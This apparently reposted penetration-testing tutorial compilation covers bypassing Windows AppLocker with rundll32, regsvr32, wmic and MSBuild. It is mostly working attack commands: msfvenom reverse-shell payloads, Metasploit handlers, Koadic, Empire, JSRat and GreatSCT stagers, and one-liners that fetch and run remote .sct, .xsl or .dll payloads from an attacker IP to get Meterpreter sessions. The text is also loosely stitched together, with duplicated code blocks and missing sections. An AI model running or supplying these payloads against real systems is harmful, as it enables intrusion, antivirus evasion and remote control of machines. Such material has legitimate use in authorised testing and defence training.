Tables of Content
- Introduction
- Working of DLL files
- Advantages
- Disadvantages
- Different methods for AppLocker Bypass using DLL files
- Conclusion
Working
When in use, DLL files are divided into sections. This makes the working of DLL files easy and faster. Each section is installed in the main program at run time. As each section is different and independent; load time is faster and is only done when the functionality of the said file is required. This ability also makes upgrades easier to apply without affecting other sections. For example, you have a dictionary program and new words are added every month, so for this, all you have to do is update it; without requiring to install a whole another program for it.
Advantages
- Uses fewer resources
- Promotes modular architecture
- Eases deployment and installation
- A dependent DLL is upgraded to a new version.
- A dependent DLL is fixed.
- A dependent DLL is overwritten with an earlier version.
- A dependent DLL is removed from the computer.
- Smb_Delivery
- MSFVenom
- Koadic
- Get-Command Prompt via cmd.dll
- JSRat
So, our method is using smb_delivery. To use this method, open the terminal in kali and type the following commands ;
msfconsole
[size=small]use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107
msf exploit(windows/smb/smb_delivery) > exploit
1
2
3
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107
msf exploit(windows/smb/smb_delivery) > exploit[/size]
Now run the malicious code through rundll32.exe in the windows machine to obtain meterpreter sessions.
[size=small]rundll32.exe \\192.168.1.107\ZtmW\test.dll,0
1
rundll32.exe \\192.168.1.107\ZtmW\test.dll,0[/size]
As soon as the command is executed, you will have your meterpreter session. To access the session type :
[size=small]sessions 1
sysinfo
1
2
sessions 1
sysinfo[/size]
MSFVenom
Our second method is via MSFVenom. For the utilization of this method, type the following command in the terminal of kali :
[size=small]msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll[/size]
[size=small]rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll
1
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll[/size]
Simultaneously, start the multi/handler to get a session by typing :
msfconsole
[size=small]msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
1
2
3
4
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit[/size]
Koadic
Our next method is using Koadic framework. Koadic is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework
Once the koadic is up and running, type:
[size=small]use stager/js/rundll32_js
set SRVHOST 192.168.1.107
run
1
2
3
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
run[/size]
Once you run the command in the cmd, you will have your session. As shown in the following image.
To access the session type :
[size=small]zombies 0
1
zombies 0[/size]
Get-Command Prompt via cmd.dll
If the command line is blocked, there is script developed by Didier Stevens which you can use to solve your little problem. You can find them in the following link :
//didierstevens.com/files/software/cmd-dll_v0_0_4.zip
In the above URL, you will download a zip file. Extract that zip file and use the following command to run the said file in run windows:
[size=small]rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll
1
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll[/size]
As soon as you run the command, you will have an unblocked the cmd. As shown below:
JSRat
Our next method of attacking regsvr32 is by using JSRat and you can download it from GitHub. This is another command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a web server and on that web server, we will find our .js file. To use this method type:
[size=small]./JSRat.py -i 192.168.1.107 -p 4444
1
./JSRat.py -i 192.168.1.107 -p 4444[/size]
Therefore, open the //192.168.1.107/wtf link in your browser. There you will find the said code as shown in the image below:
And voila, you will have a session as the image below:
Conclusion
DLL files are a collection of various codes and procedure held together. These files help windows programs to execute accurately. These files were created for multiple programs to use them simultaneously. This technique helps in memory conservation. Therefore these files are important and required by windows to run properly without giving users any kind of problems. Hence, exploitation through such files is very efficient and lethal. And above-presented methods are different ways to do it.
Windows Applocker Policy ? A Beginner?s Guide
Tables of Content
- Introduction to regsvr
- Working of regsvr
- Multiple methods to attack regsvr
Working
Information about programs associated with regsvr32 is added to windows when you register a DLL file in regsvr32. These defenses are then accessed to understand where the program data is and how to interact with it. While registering a DLL file, information is added to central the directory so that it can be used by the windows. The whole path of these files literally has the executable code and due to these files windows can call upon specific functions. These files are very convenient as when software is updated, these files automatically call upon the updated version; in short, it helps avoid the version problems of software. Usually, this file is not commonly used except for registering and unregistering DLL files.
RegSvr32.exe has the following command-line options:
Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>
To know more about it, visit here: //support.microsoft.com/en-us/help/249873/how-to-use-the-regsvr32-tool-and-troubleshoot-regsvr32-error-messages
Multiple Methods
- Web delivery
- Empire
- Manual
- MSFVenom
- Koadic
- JSRat
- GreatSCT
.sct
[size=small]use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit
1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit[/size]
Copy the highlighted text shown in the image below:
[size=small]regsvr32 /s /n /u /i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
1
regsvr32 /s /n /u /i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll[/size]
PowerShell Empire
@harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from //github.com/EmpireProject/Empire.
To have a basic guide of Empire, please visit our article introducing empire: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once the empire framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener, type :
[size=small]uselistner http
set Host //192.168.1.109
execute
1
2
3
uselistner http
set Host //192.168.1.109
execute[/size]
With the above commands, you will have an active listener. Type back to go out of listener so you can initiate your PowerShell.
Once you are out the listener, you need to use an exploit to create your malicious file. A stager, in the empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. Which means to create an exploit, we will have to usestager. Therefore, type :
[size=small]usestager windows/launcher_sct
set listener http
execute
1
2
3
usestager windows/launcher_sct
set listener http
execute[/size]
After the execution of executing the command, usestager will create a launcher.sct in /tmp. Now to get session start the python server by typing:
[size=small]python -m SimpleHTTPServer 8080
1
python -m SimpleHTTPServer 8080[/size]
[size=small]regsvr /s /n /u /i://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
1
regsvr /s /n /u /i://192.168.1.109:8080/tmp/launcher.sct scrobj.dll[/size]
In the above command, we have used port 8080 because our server of python is activated on the same port.
Once the above is executed as told, you will receive a session. To access the session type :
[size=small]interact 9ATUX4M7
1
interact 9ATUX4M7[/size]
9ATUX4M7: is an agent/session name. this will vary from session to session.
Inject PowerShell code in sct File (Manual Method)
After running this exploit, it will show you the powershell code on the terminal screen as shown in the following image :
[size=small]use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit
1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit[/size]
Copy the highlighted text shown in below:
Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.
Now we need to create a .sct file in order for our attack to run. We found a script online to create a .sct file. You can access the link for the script by clicking here. The script is shown in the image below :
[size=small]regsvr32 /u /n /s /i://192.168.1.109/1.sct scrobj.dll
1
regsvr32 /u /n /s /i://192.168.1.109/1.sct scrobj.dll[/size]
MsfVenom
[size=small]msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe[/size]
Start up the python server using the following command:
[size=small]python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80[/size]
[size=small]certutil.exe -urlcache -split -f //192.168.1.109/shell.exe
1
certutil.exe -urlcache -split -f //192.168.1.109/shell.exe[/size]
We have used certutil here as it allows to download a file in windows and also saved the file as 3.sct.
Now, run the above script using the following command:
[size=small]regsvr32 /u /n /s /i:http;//192.168.1.109/3.sct scrobj.dll
1
regsvr32 /u /n /s /i:http;//192.168.1.109/3.sct scrobj.dll[/size]
[size=small]cmd /k cd c:\Users\raj & shell.exe
1
cmd /k cd c:\Users\raj & shell.exe[/size]
This we have saved the script as 4.sct and again run this script using the following command :
[size=small]regsvr32 /u /n /s /i:http;//192.168.1.109/4.sct scrobj.dll
1
regsvr32 /u /n /s /i:http;//192.168.1.109/4.sct scrobj.dll[/size]
Simultaniously, start up the multi handler too, to get a session. Hence, type :
[size=small]use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
1
2
3
4
5
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit[/size]
Koadic
Our next method is using Koadic. Koadic is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework
Once the koadic is up and running, type:
[size=small]use stager/js/regsvr
set srvhost 192.168.1.107
run
1
2
3
use stager/js/regsvr
set srvhost 192.168.1.107
run[/size]
[size=small]regsvr32 /u /n /s /i:http;//192.168.1.107:9998/uWBjv scrobj.dll
1
regsvr32 /u /n /s /i:http;//192.168.1.107:9998/uWBjv scrobj.dll[/size]
Once you run the above command, you will have a session. To access the session type :
[size=small]zombies 0
1
zombies 0[/size]
JSRat
Our next method of attacking regsvr32 is by using JSRat and you can download it from GitHub. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a web server and on that web server, we will find our .sct file. To use this method type:
[size=small]./JSRat.py -I 192.168.1.107 -p 4444
1
./JSRat.py -I 192.168.1.107 -p 4444[/size]
Running the above command will start web server.
As we have got the command, run the command in the run window as shown in the image below:
After executing the command in the run window you will have a session as shown:
GreatSCT
GreatSCT is a tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from
[size=small]//github.com/GreatSCT/GreatSCT
1
//github.com/GreatSCT/GreatSCT[/size]
[size=small]use Bypass
1
use Bypass[/size]
List of modules will appear as shown in the image below:
From the list of modules choose the following :
[size=small]use regsvr/shellcode_iject/base64_migrate.py
generate
1
2
use regsvr/shellcode_iject/base64_migrate.py
generate[/size]
After the above commands, type 1 to choose MSFVenom
Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the given port (any) as here you can see in the image below that we have given lport as 2345
And just as you press enter it will generate two files. One of them will be a resource file and others will be a .sct file.
[size=small]python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80[/size]
Simultaneously, start the multi/handler using the resource file. For this, type :
[size=small]msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
1
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc[/size]
And you have a meterpreter session.
Conclusion
Windows Applocker Policy ? A Beginner?s Guide
Table of Content
Introduction to Wmic.exe
Exploiting Techniques
- Koadic
- Powershell Empire
- Link hta within XSL code
The WMIC utility is a Microsoft tool that provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machines and also for wmic queries, such as system settings, stop processes and run scripts locally or remotely. Therefore, it can invoke the XSL script (eXtensible Stylesheet Language).
Exploiting Techniques
Koadic
We will generate a malicious XSL file with the help of koadic which is a Command & Control tool which is quite similar to the Metasploit and Powershell Empire.
To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/
Once installation gets completed, you can run ./koadic file to start koadic and start with loading the stager/js/wmic stager by running the following command and set SRVHOST where the stager should call home.
[size=small]use stager/js/wmic
set SRVHOST 192.168.1.107
run
1
2
3
use stager/js/wmic
set SRVHOST 192.168.1.107
run[/size]
Execute WMIC following command to download and run the malicious XSL file from a remote server:
[size=small]wmic os get /FORMAT:"//192.168.1.107:9996/g8gkv.xsl"
1
wmic os get /FORMAT:"//192.168.1.107:9996/g8gkv.xsl"[/size]
Once the malicious XSL file will get executed on the target machine, you will have a Zombie connection just like Metasploit.
PowerShell Empire
//github.com/EmpireProject/Empire.
To have a basic guide of Empire, please visit our article introducing empire:
https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once the empire framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :
[size=small]listeners
uselistner http
set Host //192.168.1.107
execute
1
2
3
4
listeners
uselistner http
set Host //192.168.1.107
execute[/size]
With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your PowerShell.
[size=small]usestager windows/launcher_xsl
set Listener http
execute
1
2
3
usestager windows/launcher_xsl
set Listener http
execute[/size]
Usestager will create a malicious code file that will be saved in the /tmp named launcher.xsl.
[size=small]wmic process get brief /format:"//192.168.1.107:8080/launcher.xsl"
1
wmic process get brief /format:"//192.168.1.107:8080/launcher.xsl"[/size]
[size=small]interact Z639YHPA
sysinfo
1
2
interact Z639YHPA
sysinfo[/size]
Link hta within XSL code
As we know, wmic can execute any file or script remotely, so we will link an hta file within the XSL code. An XSL file will contain a link, to download and execute a malicious hta file via mshta.exe, which is officially triggered by wmic.
[size=small]use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
1
2
3
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit[/size]
Now copy the URL and place inside the XSL code, because they have the ability to execute language script of Microsoft.
link for writing XSL code and then place the link of hta file as shown below.
Now again we need to execute XSL file through wmic.exe with the help of the following command:
[size=small]wmic os get /FORMAT:"//192.168.1.109/payload.xsl"
1
wmic os get /FORMAT:"//192.168.1.109/payload.xsl"[/size]
Once the above command is executed you will have a session open. To access the session, type:
[size=small]sessions 1
1
sessions 1[/size]
Table of Content
Introduction to MSbuild.exe
Exploiting Techniques
- Generate CSharp file with Msfvenom
- Generate XML file to Exploit MSbuild
- Nps_payload Script
- Powershell Empire
- GreatSCT
The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuildmsbuild.exe
Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio (.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code.
Exploiting Techniques:
Generate CSharp file with Msfvenom
We use Microsoft Visual Studio to create C # (C Sharp) programming project with a *.csproj suffix that saved in MSBuild format so that it can be compiled with the MSBuild platform into an executable program.
[size=small]msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f csharp
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f csharp[/size]
The shellcode generated above should be placed in the XML file and you can download this XML file from GitHub, which has the code that the MSBuild compiles and executes. This XML file should be saved as. file.csproj and must be run via MSBuild to get a Meterpreter session.
Note: Replace the shellcode value from your C# shellcode and then rename buf as shellcode as shown in the below image.
You can run MSBuild from Visual Studio, or from the Command Window. By using Visual Studio, you can compile an application to run on any one of several versions of the .NET Framework.
For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and you can compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability to compile to more than one framework is named multitargeting.
To know more about MSBuild read from here: //docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015
Now launch multi handler to get meterpreter session and run the file.csproj file with msbuild.exe at the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.
[size=small]C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj[/size]
Note: you need to save your malicious payload (XML / csproj) at this location:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute this file with command prompt.
[size=small]use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
1
2
3
4
5
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit[/size]
As you can observe, we have the meterpreter session of the victim as shown below:
Generate XML file to Exploit MSBuild
As mentioned above, MSBuild uses an XML- based project file format that is straightforward and extensible, so we can rename the generated file.csproj as file.xml and again run the file.xml with msbuild.exe on the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.
[size=small]C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml[/size]
[size=small]use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
1
2
3
4
5
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit[/size]
As you can observe, we have the meterpreter session of the victim as shown below:
Nps_Payload Script
This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. Written by Larry Spohn (@Spoonman1091) Payload written by Ben Mauch (@Ben0xA) aka dirty_ben. You can download it from github.
Follow the below step for generating payload:
- Run ./nps_payload.py script, once you have downloaded nps payload from GitHub
- Press key 1
[size=small]msfconsole -r msbuild_nps.rc
1
msfconsole -r msbuild_nps.rc[/size]
Now repeat above step to execute msbuild_nps.xml with command prompt and obtain a reverse connection via meterpreter as shown below:
[size=small]C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml[/size]
PowerShell Empire
//github.com/EmpireProject/Empire.
To have a basic guide of Empire, please visit our article introducing empire:
Once the empire framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :
[size=small]listeners
uselistner http
set Host //192.168.1.107
execute
1
2
3
4
listeners
uselistner http
set Host //192.168.1.107
execute[/size]
With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your PowerShell.
For our MSBuild attack, we will use a stager. A stager, in the empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:
[size=small]usestager windows/launcher_xml
set Listener http
execute
1
2
3
usestager windows/launcher_xml
set Listener http
execute[/size]
Usestager will create a malicious code file that will be saved in the /tmp named launcher.xml.
[size=small]cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml
1
2
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml[/size]
[size=small]interact A8H14C7L
1
interact A8H14C7L[/size]
The above command will give you access to the session.
[size=small]sysinfo
1
sysinfo[/size]
GreatSCT
GreatSCT is a tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from here: //github.com/GreatSCT/GreatSCT
[size=small]use Bypass
1
use Bypass[/size]
Now to see the list of payloads type :
[size=small]list
1
list[/size]
Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :
[size=small]use msbuild/meterpreter/rev_tcp.py
1
use msbuild/meterpreter/rev_tcp.py[/size]
Once the command is executed, type :
[size=small]set lhost 192.168.1.107
generate
1
2
set lhost 192.168.1.107
generate[/size]
Now, it made two files. One Metasploit RC file and other a msbuild.xml file.
[size=small]python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80[/size]
[size=small]cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe msbuild.xml
1
2
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe msbuild.xml[/size]
Simultaneously, start the multi/handler using the resource file. For this, type :
[size=small]msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
1
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc[/size]
And voila! We have a meterpreter session as shown here.
Reference: //docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017
